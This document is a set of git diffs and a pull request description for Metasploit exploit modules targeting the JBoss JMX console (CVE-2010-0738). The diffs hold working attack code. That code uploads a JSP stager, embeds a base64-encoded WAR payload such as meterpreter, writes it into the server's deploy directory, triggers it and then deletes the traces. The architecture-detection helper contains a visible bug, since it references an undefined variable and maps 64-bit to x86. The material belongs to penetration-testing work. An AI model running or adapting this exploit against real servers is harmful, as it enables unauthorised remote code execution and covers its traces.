 			'DisclosureDate' => "Apr 26 2010",
 			'DefaultTarget'  => 0))
 
 		register_options(
 			[
 				Opt::RPORT(8080),
-				OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
+                OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
+                OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
 				OptString.new('JSP',   [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
 				OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
 				OptString.new('PATH',  [ true,  'The URI path of the JMX console', '/jmx-console' ]),
@@ -66,40 +94,88 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
 		app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
+		stager_base = rand_text_alpha(8+rand(8))
+		stager_jsp  = rand_text_alpha(8+rand(8))
 
-		p = payload
-		if datastore['SHELL'] == 'automatic'
-			if not (plat = detect_platform())
-				fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
-			end
+        p = payload
+        mytarget = target
 
-			case plat
-			when 'linux'
-				datastore['SHELL'] = '/bin/sh'
-			when 'win'
-				datastore['SHELL'] = 'cmd.exe'
-			end
+        if (target.name =~ /Automatic/)
+        	mytarget = auto_target()
+            if (not mytarget)
+            	fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
+            end
+            print_status("Automatically selected target \"#{mytarget.name}\"")
+        else
+        	print_status("Using manually select target \"#{mytarget.name}\"")
+        end
+        arch = mytarget.arch
 
-			print_status("SHELL set to #{datastore['SHELL']}")
+        # set arch/platform from the target
+        plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
 
-			return if ((p = exploit_regenerate_payload(plat, target_arch)) == nil)
-		end
+        # We must regenerate the payload in case our auto-magic changed something.
+        return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
+
+        # Generate the WAR containing the payload
+        war_data = p.encoded_war({
+        	:app_name => app_base,
+            :jsp_name => jsp_name,
+            :arch => mytarget.arch,
+            :platform => mytarget.platform
+        }).to_s
+
+        encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
+
+		# Dynamic variables
+		content_var = rand_text_alpha(8+rand(8))
+		decoded_var = rand_text_alpha(8+rand(8))
+		file_path_var = rand_text_alpha(8+rand(8))
+		jboss_home_var = rand_text_alpha(8+rand(8))
+		fos_var = rand_text_alphanumeric(8+rand(8))
 
 
+        # The following jsp script will write the exploded WAR file to the deploy/
+        # directory or try to delete it
+        jsp_script = <<-EOT
+<%@page import="java.io.*,
+        java.util.*,
+        sun.misc.BASE64Decoder"
+%>
+
+<%
+
+	String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+	String #{file_path_var} = #{jboss_home_var} + "/deploy/management/" + "#{app_base}.war";
+
+
+	try {
+		String #{content_var} = "#{encoded_payload}";
+    	byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
+    	FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
+    	#{fos_var}.write(#{decoded_var});
+    	#{fos_var}.close();
+		}
+   	catch(Exception e) 
+   	{
+   	}
+%>
+
+EOT
 		#
-		# UPLOAD
+		# UPLOAD stager with the payload war file
 		#
 		data =  'action=invokeOpByName'
 		data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
 		data << '&methodName=store'
 		data << '&argType=java.lang.String'
-		data << '&arg0=' + Rex::Text.uri_encode(app_base) + '.war'
+		data << '&arg0=' + Rex::Text.uri_encode(stager_base) + '.war'
 		data << '&argType=java.lang.String'
-		data << '&arg1=' + jsp_name
+		data << '&arg1=' + stager_jsp 
 		data << '&argType=java.lang.String'
 		data << '&arg2=.jsp'
 		data << '&argType=java.lang.String'
-		data << '&arg3=' + Rex::Text.uri_encode(p.encoded)
+		data << '&arg3=' + Rex::Text.uri_encode(jsp_script)
 		data << '&argType=boolean'
 		data << '&arg4=True'
 
@@ -118,49 +194,31 @@ class Metasploit3 < Msf::Exploit::Remote
 				}, 5)
 		end
 
+
 		#
-		# EXECUTE
-		#
-		# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
-		# but the file still gets written.
-		if (res.code == 200 || res.code == 500)
-			uri = '/' + app_base + '/' + jsp_name + '.jsp'
-			print_status("Triggering payload at '#{uri}'...")
-			verb = 'GET'
-			if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
-				verb = 'HEAD'
-			end
-			# JBoss might need some time for the deployment. Try 5 times at most
-			# and sleep 3 seconds in between.
-			5.times do
-				res = send_request_raw(
-					{
-						'uri'    => uri,
-						'method' => verb,
-					})
-				if !res
-					print_error("Execution failed on '#{uri}' [No Response], retrying...")
-					select(nil,nil,nil,3)
-				elsif (res.code < 200 or res.code >= 300)
-					print_error("Execution failed on '#{uri}' [#{res.code} #{res.message}], retrying...")
-					select(nil,nil,nil,3)
-				elsif res.code == 200
-					print_status("Successfully triggered payload at '#{uri}'.")
-					break
-				else
-					print_error("Denied...")
-				end
-			end
+		# Call the stager to deploy the payload war file
+        # Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
+        # but the file still gets written.
+        if (res.code == 200 || res.code == 500)
+			print_status("Calling stager to deploy the payload warfile (might take some time)")
+			stager_uri = '/' + stager_base + '/' + stager_jsp + '.jsp'
+			stager_res = call_uri_mtimes(stager_uri)
+
+			print_status("Try to call the deployed payload")
+			# Try to execute the payload by calling the deployed WAR file
+			payload_uri = "/" + app_base + "/" + jsp_name + '.jsp'
+			payload_res = call_uri_mtimes(payload_uri)
 
 			#
 			# DELETE
 			#
 			# The WAR can only be removed by physically deleting it, otherwise it
 			# will get redeployed after a server restart.
-			print_status("Undeploying #{uri} by deleting the WAR file via DeploymentFileRepository.remove()...")
-			res1 = delete_file(Rex::Text.uri_encode(app_base) + '.war', jsp_name, '.jsp')
-			res2 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
-			[res1, res2].each do |res|
+			print_status("Undeploying stager and payload WARs via DeploymentFileRepository.remove()...")
+			res1 = delete_file(Rex::Text.uri_encode(stager_base) + '.war', stager_jsp, '.jsp')
+			res2 = delete_file('./', Rex::Text.uri_encode(stager_base) + '.war', '')
+			res3 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
+			[res1, res2, res3].each do |res|
 				if !res
 					print_error("WARNING: Unable to remove WAR [No Response]")
 				end
@@ -168,7 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
 				end
 			end
-
+            
 			handler
 		end
 	end
@@ -195,19 +253,72 @@ class Metasploit3 < Msf::Exploit::Remote
 		else
 			res = send_request_cgi(
 				{
-					'uri'    =>  datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
+					'uri'    => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
 					'method' => datastore['VERB'],
 				}, 5)
 		end
 		res
 	end
 
-	def detect_platform
-		print_status("Attempting to automatically detect the platform...")
+	# Call the URL multiple times until we have hit
+	def call_uri_mtimes(uri, num_attempts = 5)
+        verb = 'HEAD' if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
+
+    	# JBoss might need some time for the deployment. Try 5 times at most and
+        # wait 5 seconds inbetween tries
+        num_attempts.times do |attempt|
+            res = send_request_cgi({
+                'uri'    => uri,
+				'method' => verb 
+            }, 20)
+
+            msg = nil
+            if (!res)
+                msg = "Execution failed on #{uri} [No Response]"
+            elsif (res.code < 200 or res.code >= 300)
+                msg = "http request failed to #{uri} [#{res.code}]"
+            elsif (res.code == 200)
+                print_status("Successfully called '#{uri}'")
+                return res
+            end
+
+            if (attempt < num_attempts - 1)
+                msg << ", retrying in 5 seconds..."
+                print_status(msg)
+                select(nil, nil, nil, 5)
+            else
+                print_error(msg)
+				return res
+            end
+        end 
+	end
+
+
+    def auto_target
+    	print_status("Attempting to automatically select a target...")
+        res = query_serverinfo
+        if not (plat = detect_platform(res))
+        	fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
+        end
+
+        if not (arch = detect_architecture(res))
+        	fail_with(Exploit::Failure::NoTarget, 'Unable to detect architecture!')
+        end
+
+        # see if we have a match
+        targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
+
+        # no matching target found, use Java as fallback
+        java_targets = targets.select {|t| t.name =~ /^Java/ }
+        return java_targets[0]
+    end
+
+
+	def query_serverinfo
 		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
-				'uri' => path,
+				'uri'    => path
 			}, 20)
 
 		if (not res) or (res.code != 200)
@@ -215,6 +326,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			return nil
 		end
 
+		res
+	end
+
+	# Try to autodetect the target platform
+	def detect_platform(res)
 		if (res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m)
 			os = $1
 			if (os =~ /Linux/i)
@@ -227,4 +343,19 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 		nil
 	end
+
+
+	# Try to autodetect the target architecture
+	def detect_architecture(res)
+		if (res.body =~ /<td.*?OSArch.*?(x86|i386|i686|x86_64|amd64).*?<\/td>/m)
+			arch = $1
+			if (arch =~ /(x86|i386|i686)/i)
+				return ARCH_X86
+			elsif (os =~ /(x86_64|amd64)/i)
+				return ARCH_X86
+			end
+		end
+		nil
+	end
+
 end

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				payload. This method will only work if the target server allows outbound
 				connections to us.
 			},
-			'Author'      => [ 'jduck', 'Patrick Hof' ],
+			'Author'      => [ 'jduck', 'Patrick Hof', 'h0ng10'],
 			'License'     => MSF_LICENSE,
 			'Version'     => '$Revision$',
 			'References'  =>
@@ -94,27 +94,32 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('JSP',      [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
 				OptString.new('APPBASE',  [ false, 'Application base name, (default: random)', nil ]),
 				OptString.new('PATH',     [ true,  'The URI path of the console', '/jmx-console' ]),
-				OptString.new('VERB',     [ true,  'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]),
 				OptString.new('WARHOST',  [ false, 'The host to request the WAR payload from' ]),
 				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine' ]),
+         		OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])
+
 
 			], self.class)
 	end
 
 
 	def auto_target
-		print_status("Attempting to automatically select a target...")
-		res = query_serverinfo
-		if not (plat = detect_platform(res))
-			fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
-		end
+		if datastore['VERB'] == 'HEAD' then
+			print_status("Sorry, automatic target detection doesn't work wit HEAD requests")
+		else
+			print_status("Attempting to automatically select a target...")
+			res = query_serverinfo
+			if not (plat = detect_platform(res))
+				fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
+			end
 
-		if not (arch = detect_architecture(res))
-			fail_with(Exploit::Failure::NoTarget, 'Unable to detect architecture!')
-		end
+			if not (arch = detect_architecture(res))
+				fail_with(Exploit::Failure::NoTarget, 'Unable to detect architecture!')
+			end
 
-		# see if we have a match
-		targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
+			# see if we have a match
+			targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
+		end
 
 		# no matching target found, use Java as fallback
 		java_targets = targets.select {|t| t.name =~ /^Java/ }
@@ -128,11 +133,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
 		app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
-
-		verb = 'GET'
-		if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
-			verb = 'HEAD'
-		end
 
 		mytarget = target
 		if (target.name =~ /Automatic/)
@@ -178,9 +178,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
-		if (verb == "POST")
+		if (datastore['VERB'] == "POST")
 			res = send_request_cgi({
-					'method'    => verb,
+					'method'    => datastore['VERB'],
 					'uri'       => datastore['PATH'] + '/HtmlAdaptor',
 					'vars_post' =>
 						{
@@ -190,10 +190,10 @@ class Metasploit3 < Msf::Exploit::Remote
 							'argType'     => 'java.lang.String',
 							'arg0'        => service_url
 						}
-				})
+				}, 30)
 		else
 			res = send_request_cgi({
-					'method'    => verb,
+					'method'    => datastore['VERB'],
 					'uri'       => datastore['PATH'] + '/HtmlAdaptor',
 					'vars_get' =>
 						{
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'argType'     => 'java.lang.String',
 							'arg0'        => service_url
 						}
-				})
+				}, 20)
 		end
 		if (! res)
 			fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR archive [No Response]")
@@ -237,8 +237,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Executing #{app_base}...")
 
         # The payload doesn't like POST requests
-        tmp_verb = verb
-        tmp_verb = 'GET' if (verb == 'POST')
+		# As the war file is not stored inside the jmx-console, we don't have to 
+		# care about the selected http method
+        tmp_verb = datastore['VERB'] 
+        tmp_verb = 'GET' if tmp_verb == 'POST'
 
 		# JBoss might need some time for the deployment. Try 5 times at most and
 		# wait 3 seconds inbetween tries
@@ -277,7 +279,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		print_status("Undeploying #{app_base} ...")
 		res = send_request_cgi({
-			'method'    => verb,
+			'method'    => datastore['VERB'],
 			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
 			'vars_post' =>
 				{
@@ -290,8 +292,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		}, 20)
 		if (! res)
 			print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
+		elsif (res.code == 500 and datastore['VERB'] == 'POST')
+			# POST requests result in a http 500 error, but the payload is removed..."
+			print_status("WARNING: Undeployment might have failed (unlikely)")
 		elsif (res.code < 200 or res.code >= 300)
-			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
+			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") 
 		end
 
 		handler

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -236,14 +236,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		print_status("Executing #{app_base}...")
 
+        # The payload doesn't like POST requests
+        tmp_verb = verb
+        tmp_verb = 'GET' if (verb == 'POST')
+
 		# JBoss might need some time for the deployment. Try 5 times at most and
 		# wait 3 seconds inbetween tries
 		uri = '/' + app_base + '/' + jsp_name + '.jsp'
 		num_attempts = 5
-		num_attempts.times { |attempt|
+		num_attempts.times do |attempt|
 			res = send_request_cgi({
 					'uri'     => uri,
-					'method'  => 'GET'
+					'method'  => tmp_verb 
 				}, 20)
 
 			msg = nil
@@ -264,7 +268,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			else
 				print_error(msg)
 			end
-		}
+		end
 
 		#
 		# DELETE

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('PATH',     [ true,  'The URI path of the console', '/jmx-console' ]),
 				OptString.new('WARHOST',  [ false, 'The host to request the WAR payload from' ]),
 				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine' ]),
-         		OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])
+				OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])
 
 
 			], self.class)
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'argType'     => 'java.lang.String',
 							'arg0'        => service_url
 						}
-				}, 20)
+				}, 30)
 		end
 		if (! res)
 			fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR archive [No Response]")
@@ -236,11 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		print_status("Executing #{app_base}...")
 
-        # The payload doesn't like POST requests
-		# As the war file is not stored inside the jmx-console, we don't have to 
+		# The payload doesn't like POST requests
+		# As the war file is not stored inside the jmx-console, we don't have to
 		# care about the selected http method
-        tmp_verb = datastore['VERB'] 
-        tmp_verb = 'GET' if tmp_verb == 'POST'
+		tmp_verb = datastore['VERB']
+		tmp_verb = 'GET' if tmp_verb == 'POST'
 
 		# JBoss might need some time for the deployment. Try 5 times at most and
 		# wait 3 seconds inbetween tries
@@ -249,8 +249,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		num_attempts.times do |attempt|
 			res = send_request_cgi({
 					'uri'     => uri,
-					'method'  => tmp_verb 
-				}, 20)
+					'method'  => tmp_verb
+				}, 30)
 
 			msg = nil
 			if (! res)
@@ -289,14 +289,14 @@ class Metasploit3 < Msf::Exploit::Remote
 					'argType'     => 'java.lang.String',
 					'arg0'        => app_base
 				}
-		}, 20)
+		}, 30)
 		if (! res)
 			print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
 		elsif (res.code == 500 and datastore['VERB'] == 'POST')
 			# POST requests result in a http 500 error, but the payload is removed..."
 			print_status("WARNING: Undeployment might have failed (unlikely)")
 		elsif (res.code < 200 or res.code >= 300)
-			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") 
+			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
 		end
 
 		handler


### PR DESCRIPTION
This is an other cleanup for the JBOSS module, mainly smaller cleanups
and corrections for my last commit.

I also updated the jboss_deploymentfilerepository module so that it now deploys
additional payloads like meterpreter (java/linux/windows)

This is done by placing the payload as a base64 encoded string in the "stager"
war, which then deploys the final payload as a second war file on the target.
Both (stager and payload) are removed after exploitation.

The updated module was tested against JBOSS 4.0.5 running on Linux (Ubuntu 10.04)
and Windows 2003.

Sorry, for the bad commit style (I know I should have done this in separate commits...)
If you have any questions, please let me know.
